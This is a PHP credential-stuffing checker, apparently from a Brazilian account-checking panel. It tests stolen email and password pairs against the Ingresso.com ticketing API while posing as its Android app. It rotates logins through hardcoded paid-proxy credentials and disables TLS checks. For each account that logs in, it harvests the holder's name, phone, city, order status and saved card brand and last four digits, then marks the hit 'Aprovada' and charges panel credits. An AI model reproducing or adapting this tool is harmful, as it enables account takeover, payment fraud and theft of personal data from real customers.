SP4RTAN.G4D0

1. <?php
2. extract($_GET);
3. error_reporting(0);
4.  
5. $separar = explode("|", $lista);
6. $email = $separar[0];
7. $senha = $separar[1];
8.  
9. function getStr($string, $start, $end) {
10.     $str = explode($start, $string);
11.     $str = explode($end, $str[1]);
12.     return $str[0];
13. }
14.  
15.     function soNumero($str) {
16.         return preg_replace("/[^0-9]/", "", $str);
17.     }
18.  
19.  
20. function inStr($string, $start, $end, $value) {
21.     $str = explode($start, $string);
22.     $str = explode($end, $str[$value]);
23.     return $str[0];
24. }
25.  
26.  
27. function getString($string, $start, $end, $value)
28. {
29.     $str = explode($start, $string);
30.     $str = explode($end, $str[$value]);
31.     return $str[0];
32. }
33.  
34.  
35.  
36. if (file_exists(getcwd() . '/cookie.txt')) {
37.     unlink(getcwd() . '/cookie.txt');
38. }
39.  
40. if ($_SERVER['REQUEST_METHOD'] == 'POST') {
41.     extract($_POST);
42. } elseif ($_SERVER['REQUEST_METHOD'] == 'GET') {
43.     extract($_GET);
44. }
45.  
46. function getStr2($string,$start,$end) {
47.   $str = explode($start,$string);
48.   $str = explode($end,$str[1]);
49.   return $str[0];
50. }
51.  
52.  
53. function Curl($url = false, $post = false, $header = false) {
54.         $ch = curl_init();
55.         curl_setopt($ch, CURLOPT_URL, $url);
56.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
57.         curl_setopt($ch, CURLOPT_COOKIEJAR, dirname(__FILE__) ."/cookie_.txt");
58.         curl_setopt($ch, CURLOPT_COOKIEFILE, dirname(__FILE__) ."/cookie_.txt");
59.         curl_setopt($ch, CURLOPT_COOKIE, dirname(__FILE__) ."/cookie_.txt");
60.         curl_setopt($ch, CURLOPT_COOKIESESSION, dirname(__FILE__) ."/cookie_.txt");
61.         curl_setopt($ch, CURLOPT_TIMEOUT, 25);
62.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
63.         if ($post) {
64.             curl_setopt($ch, CURLOPT_POST, 1);
65.             curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
66.         }
67.         if ($header) {
68.             curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
69.         }
70.         $exec = curl_exec($ch);
71.         return $exec;
72.     }
73. //*//*#Curl//*////*//
74.  
75. $proxy = curl_exec($ch);
76. $username = 'lum-customer-hl_f8a3ee8d-zone-static';
77. $password = 'fpwerybl8cna';
78. $port = 22225;
79. $session = mt_rand();
80. $super_proxy = 'servercountry-AU.zproxy.lum-superproxy.io';
81. $result = curl_exec($curl);
82. curl_close($curl);
83. if ($result)
84. echo $result;
85.  
86. $ch = curl_init();
87.     curl_setopt($ch, CURLOPT_URL, "https://api.ingresso.com/v1/token");
88.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
89.     curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
90.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
91.     curl_setopt($ch, CURLOPT_PROXY, "http://$super_proxy:$port");
92.     curl_setopt($ch, CURLOPT_PROXYUSERPWD, "$username-session-$session:$password");
93.     curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."/americanas.txt");
94.     curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."/americanas.txt");
95.     curl_setopt($ch, CURLOPT_USERAGENT, "okhttp/3.11.0");
96.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
97.     curl_setopt($ch, CURLOPT_HTTPHEADER, array(
98.         'Host: api.ingresso.com',
99.         'X-APP-ORIGIN: TicketingAppAndroid',
100.         'X-APP-VERSION: 2.9.1',
101.         'Accept: application/json',
102.         'Content-Type: application/x-www-form-urlencoded',
103.         'Connection: keep-alive'));
104.     curl_setopt($ch, CURLOPT_POST, 1);
105.     curl_setopt($ch, CURLOPT_POSTFIELDS, 'username='.$email.'&password='.$senha.'&grant_type=password&client_origin=android%3A17085c27ee70f283');
106.     $resposta = curl_exec($ch);
107.     $dados = json_decode($resposta, true);
108.     $userid = $dados['user_id'];
109.     $token = $dados['access_token'];
110.  
111.  
112.     if (strpos($resposta, 'access_token')) {
113.  
114.         $ch = curl_init();
115.         curl_setopt($ch, CURLOPT_URL, "https://api.ingresso.com/v1/users/".$userid."/orders?renderView=my-orders&deviceId=17085c27ee70f283&limit=10&skip=0&cancelled=true ");
116.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
117.         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
118.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
119.         curl_setopt($ch, CURLOPT_PROXY, "http://$super_proxy:$port");
120.         curl_setopt($ch, CURLOPT_PROXYUSERPWD, "$username-session-$session:$password");
121.         curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."/americanas.txt");
122.         curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."/americanas.txt");
123.         curl_setopt($ch, CURLOPT_USERAGENT, "okhttp/3.11.0");
124.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
125.         curl_setopt($ch, CURLOPT_HTTPHEADER, array(
126.             'Host: api.ingresso.com',
127.             'X-APP-ORIGIN: TicketingAppAndroid',
128.             'X-APP-VERSION: 2.9.1',
129.             'Accept: application/json',
130.             'Content-Type: application/x-www-form-urlencoded',
131.             'Authorization: Bearer '.$token.'',
132.             'Connection: keep-alive'));
133.         $resposta2 = curl_exec($ch);
134.  
135.         if (strpos($resposta2, 'Aprovado')) {
136.             $pedidosAprovados = "<font class='label label-success'>Contem pedidos aprovados</font>";
137.         }else {
138.             $pedidosAprovados = "<font class='label label-danger'>Não contem pedidos aprovados</font>";
139.         }
140.  
141.  
142.         $ch = curl_init();
143.         curl_setopt($ch, CURLOPT_URL, "https://api.ingresso.com/v1/users/".$userid."/payments");
144.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
145.         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
146.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
147.         curl_setopt($ch, CURLOPT_PROXY, "http://$super_proxy:$port");
148.         curl_setopt($ch, CURLOPT_PROXYUSERPWD, "$username-session-$session:$password");
149.         curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."/americanas.txt");
150.         curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."/americanas.txt");
151.         curl_setopt($ch, CURLOPT_USERAGENT, "okhttp/3.11.0");
152.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
153.         curl_setopt($ch, CURLOPT_HTTPHEADER, array(
154.             'Host: api.ingresso.com',
155.             'X-APP-ORIGIN: TicketingAppAndroid',
156.             'X-APP-VERSION: 2.9.1',
157.             'Accept: application/json',
158.             'Content-Type: application/x-www-form-urlencoded',
159.             'Authorization: Bearer '.$token.'',
160.             'Connection: keep-alive'));
161.         $resposta3 = curl_exec($ch);
162.  
163.         if (strpos($resposta3, 'lastFourDigits')) {
164.             $ultimosdigitosCC = getStr($resposta3, '"lastFourDigits":"','",');
165.             $bandeira = getStr($resposta3, '"cardType":"','",');
166.             $cc = "<font class='label label-warning'>".$bandeira." - ".$ultimosdigitosCC."</font>";
167.         }else{
168.             $cc = "<font class='label label-danger'>Sem cartão cadastrado</font>";
169.         }
170.  
171.  
172.  
173.         $ch = curl_init();
174.         curl_setopt($ch, CURLOPT_URL, "https://api.ingresso.com/v1/users/".$userid."");
175.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
176.         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
177.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
178.         curl_setopt($ch, CURLOPT_PROXY, "http://$super_proxy:$port");
179.         curl_setopt($ch, CURLOPT_PROXYUSERPWD, "$username-session-$session:$password");
180.         curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."/americanas.txt");
181.         curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."/americanas.txt");
182.         curl_setopt($ch, CURLOPT_USERAGENT, "okhttp/3.11.0");
183.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
184.         curl_setopt($ch, CURLOPT_HTTPHEADER, array(
185.             'Host: api.ingresso.com',
186.             'X-APP-ORIGIN: TicketingAppAndroid',
187.             'X-APP-VERSION: 2.9.1',
188.             'Accept: application/json',
189.             'Content-Type: application/x-www-form-urlencoded',
190.             'Authorization: Bearer '.$token.'',
191.             'Connection: keep-alive'));
192.         $resposta4 = curl_exec($ch);
193.  
194.         $telefone = getStr($resposta4, '"phoneNumber":"','",');
195.         $localcity = getStr($resposta4, '"city":"','",');
196.         $localstate = getStr($resposta4, '"stateRegion":"','",');
197.  
198.  
199.  
200. echo "<strong><font color='#1ABE88'><div class='dd-content box'><i class='fa fa-check'></i>#Aprovada | $email | $senha <font class='label label-primary'> ".$dados['user_first_name']."</font>&nbsp <font class='label label-primary'>".$telefone." </font>&nbsp <font class='label label-default'>".$localcity." - ".$localstate." </font>&nbsp ".$pedidosAprovados."&nbsp ".$cc." - SlokeCentral";
201. debitar_creditos("1.00");
202. contar_login();
203. }else{
204.           echo "<strong><font color='#DA514A'><div class='dd-content box'><i class='fa fa-times'></i>#Reprovada $email | $senha | $loginEmail - #SLOKECENTRAL";
205. }
206.  
207. ?>